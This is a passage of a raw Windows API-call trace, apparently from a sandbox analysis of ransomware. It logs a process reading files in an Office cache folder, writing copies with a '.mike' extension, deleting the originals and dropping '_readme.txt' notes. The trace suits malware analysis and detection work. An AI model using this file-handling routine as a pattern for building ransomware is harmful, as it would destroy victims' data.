(dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.385] GetFileType (hFile=0x264) returned 0x1 [0040.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.386] GetFileType (hFile=0x264) returned 0x1 [0040.386] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.386] ReadFile (in: hFile=0x264, lpBuffer=0x20de8ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20de8ac*, lpNumberOfBytesRead=0x2af110*=0x567, lpOverlapped=0x0) returned 1 [0040.387] CloseHandle (hObject=0x264) returned 1 [0040.387] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.388] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.388] GetFileType (hFile=0x264) returned 0x1 [0040.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.388] GetFileType (hFile=0x264) returned 0x1 [0040.388] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.388] WriteFile (in: hFile=0x264, lpBuffer=0x20e706c*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20e706c*, lpNumberOfBytesWritten=0x2af104*=0x570, lpOverlapped=0x0) returned 1 [0040.388] CloseHandle (hObject=0x264) returned 1 [0040.389] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.389] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.389] GetFileType (hFile=0x264) returned 0x1 [0040.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.389] GetFileType (hFile=0x264) returned 0x1 [0040.390] WriteFile (in: hFile=0x264, lpBuffer=0x20ea2ac*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x20ea2ac*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.390] CloseHandle (hObject=0x264) returned 1 [0040.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.391] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2460680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2460680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24867e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x790)) returned 1 [0040.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.392] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x20eba7c | out: lpFileInformation=0x20eba7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2460680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2460680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24867e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x790)) returned 1 [0040.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.392] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", dwFileAttributes=0x80) returned 1 [0040.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.392] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0040.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.393] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpFilePart=0x0) returned 0x4e [0040.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.393] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.394] GetFileType (hFile=0x264) returned 0x1 [0040.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.394] GetFileType (hFile=0x264) returned 0x1 [0040.394] WriteFile (in: hFile=0x264, lpBuffer=0x20ed7b4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x20ed7b4*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.395] CloseHandle (hObject=0x264) returned 1 [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpFilePart=0x0) returned 0x4b [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.395] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.395] GetFileType (hFile=0x264) returned 0x1 [0040.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.395] GetFileType (hFile=0x264) returned 0x1 [0040.395] CloseHandle (hObject=0x264) returned 1 [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.395] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.396] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.396] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.396] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20f1930 | out: lpFileInformation=0x20f1930*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a)) returned 1 [0040.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.396] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.396] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20f1c4c | out: lpFileInformation=0x20f1c4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a)) returned 1 [0040.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.396] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.396] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.396] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.397] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.397] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.397] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.397] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.397] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.397] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.397] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.397] GetFileType (hFile=0x264) returned 0x1 [0040.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.397] GetFileType (hFile=0x264) returned 0x1 [0040.397] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.398] WriteFile (in: hFile=0x264, lpBuffer=0x20f2ac8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.398] CloseHandle (hObject=0x264) returned 1 [0040.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.399] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20f25d0 | out: lpFileInformation=0x20f25d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a)) returned 1 [0040.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.399] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.399] GetFileType (hFile=0x264) returned 0x1 [0040.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.399] GetFileType (hFile=0x264) returned 0x1 [0040.399] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.399] ReadFile (in: hFile=0x264, lpBuffer=0x20f3bf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20f3bf0*, lpNumberOfBytesRead=0x2af110*=0x93a, lpOverlapped=0x0) returned 1 [0040.413] CloseHandle (hObject=0x264) returned 1 [0040.414] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.414] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.414] GetFileType (hFile=0x264) returned 0x1 [0040.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.414] GetFileType (hFile=0x264) returned 0x1 [0040.414] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.414] WriteFile (in: hFile=0x264, lpBuffer=0x20fa200*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20fa200*, lpNumberOfBytesWritten=0x2af104*=0x940, lpOverlapped=0x0) returned 1 [0040.414] CloseHandle (hObject=0x264) returned 1 [0040.415] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.415] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.415] GetFileType (hFile=0x264) returned 0x1 [0040.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.415] GetFileType (hFile=0x264) returned 0x1 [0040.416] WriteFile (in: hFile=0x264, lpBuffer=0x20fd428*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x20fd428*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.416] CloseHandle 